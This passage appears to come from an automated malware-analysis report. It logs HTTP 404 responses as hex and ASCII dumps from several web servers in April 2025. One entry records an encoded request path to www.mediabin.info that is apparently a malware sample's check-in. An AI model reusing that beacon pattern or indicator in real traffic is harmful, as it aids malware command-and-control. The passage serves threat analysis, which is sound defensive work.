6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 238content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Fri, 25 Apr 2025 14:07:50 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff d2 cf ad ac 4c d3 57 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 e3 b2 f1 08 b2 e3 b2 f1 b4 2b 2f 2f d7 cb 4d 4d c9 4c 4c ca cc d3 cb cc 4b cb 07 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 5a 9e c5 37 de 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y#LW(O,V/QH/KQS(,V(N-*K-+//MMLLKwwZ7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 238content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Fri, 25 Apr 2025 14:07:52 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff d2 cf ad ac 4c d3 57 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 e3 b2 f1 08 b2 e3 b2 f1 b4 2b 2f 2f d7 cb 4d 4d c9 4c 4c ca cc d3 cb cc 4b cb 07 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 5a 9e c5 37 de 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y#LW(O,V/QH/KQS(,V(N-*K-+//MMLLKwwZ7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 238content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Fri, 25 Apr 2025 14:07:55 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff d2 cf ad ac 4c d3 57 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 e3 b2 f1 08 b2 e3 b2 f1 b4 2b 2f 2f d7 cb 4d 4d c9 4c 4c ca cc d3 cb cc 4b cb 07 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 5a 9e c5 37 de 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y#LW(O,V/QH/KQS(,V(N-*K-+//MMLLKwwZ7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 621date: Fri, 25 Apr 2025 14:07:58 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 79 79 66 2f 3f 4e 56 30 78 3d 47 6c 63 47 59 43 36 48 77 70 54 38 46 61 62 6b 43 32 74 49 49 76 4c 37 38 74 69 4e 37 36 62 63 66 56 38 34 70 6c 77 62 35 4e 6b 33 6e 6b 77 45 2b 41 4b 63 2b 57 77 2f 6f 62 64 41 74 4b 53 44 79 72 44 7a 6f 4e 68 6e 30 6a 47 71 48 58 78 38 4a 39 4e 73 64 78 61 61 6a 6d 54 48 31 61 67 6e 35 47 35 64 4d 55 4a 61 68 78 72 73 5a 63 63 44 70 51 58 79 77 35 41 3d 26 61 6d 70 3b 66 78 3d 50 4a 71 48 77 4a 49 78 6b 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6d 65 64 69 61 62 69 6e 2e 69 6e 66 6f 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /myyf/?NV0x=GlcGYC6HwpT8FabkC2tIIvL78tiN76bcfV84plwb5Nk3nkwE+AKc+Ww/obdAtKSDyrDzoNhn0jGqHXx8J9NsdxaajmTH1agn5G5dMUJahxrsZccDpQXyw5A=&fx=PJqHwJIxk was not found on this server.<HR><I>www.mediabin.info</I></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:04 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:08 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:14 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:21 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:24 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 